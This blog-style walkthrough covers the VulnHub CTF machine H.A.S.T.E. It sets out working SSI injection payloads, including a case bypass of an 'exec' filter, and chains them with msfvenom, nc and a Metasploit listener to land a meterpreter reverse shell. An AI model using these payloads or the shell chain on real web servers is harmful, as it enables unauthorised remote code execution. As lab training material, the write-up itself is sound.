H.A.S.T.E v1: CTF walkthrough

Yesterday (14th October 2017) my leet boys, @ch3rn0byl and @H4v0k, decided to begin a new VulnHub VM, despite the late hour, I followed them.

I learned a new attack vector: SSI injection. Thanks.


  • ch3rn0byl: we just started the haste one if you want to do it (00:28)
  • [..snip..]
  • H4v0k: boot it up amon , sleep is for the weak (00:31)
  • ch3rn0byl: sleep is for the bitchesssssss (00:32)
  • [..snip..]
  • ch3rn0byl: fucking haste (02:38)

Note, if you want to learn more about windows exploit development you can read the ch3rn0byl’s blog: here.


Name: H.A.S.T.E: 1

Date release: 13 Sep 2017

Author: f1re_w1re

Series: H.A.S.T.E

Web page: https://securityshards.wordpress.com/2017/09/13/new-h-a-s-t-e-hacking-challenge/

Aim: get any kind of shell in the system.


We can find the IP address of the system with arp-scan.


Nmap find only one port open.

[email protected]:~/Desktop# nmap

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-15 08:38 CEST
Nmap scan report for yoda.home (
Host is up (0.029s latency).
Not shown: 999 closed ports
80/tcp open  http
MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology)

Nmap done: 1 IP address (1 host up) scanned in 61.85 seconds
[email protected]:~/Desktop#

Website Analyse

With a quick enumeration of the structure of the website we can find an SSI page where an ls command is executed and different pages with the .shtml extension. If you google shtml on google you will find interesting documents and one attack vector.

Due to a non sanitised input in the HTTP form we can execute commands on the system.

Request Body:
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

xxx=Offsec&feedback=<!--#EXEC cmd="whoami; id; pwd" -->

SSI remote command injection request

SSI remote command injection response

Note that the normal way to execute a command with SSI injection is to use the exec keyword instead of EXEC but after few try the exec string seems to be remove after the form validation, in the PHP page.

From RCE to Reverse Shell

As usual, we generate a reverse shell with msfvenom.

[email protected]:~/Desktop# msfvenom --platform linux -p linux/x86/meterpreter/reverse_tcp LPORT=1337 LHOST= -f elf -o rshell
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: rshell
[email protected]:~/Desktop#

Then, we upload the reverse shell into the system.

#Attacker command
nc -nvv 1337 < rshell

#SSI injection command
<!--#EXEC cmd="/bin/nc -lvvp 1337 > /tmp/rshell" -->

We configure our meterpreter listener.

[email protected]:~/Desktop# msfconsole -q 
msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 1337
LPORT => 1337
msf exploit(handler) > set LHOST
msf exploit(handler) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 
msf exploit(handler) >

We change the permission and we execute the reverse shell.

#Set permission to executable
<!--#EXEC cmd="chmod +x /tmp/rshell" -->

#Execute the reverse shell
<!--#EXEC cmd="/tmp/rshell" -->

Reverse shell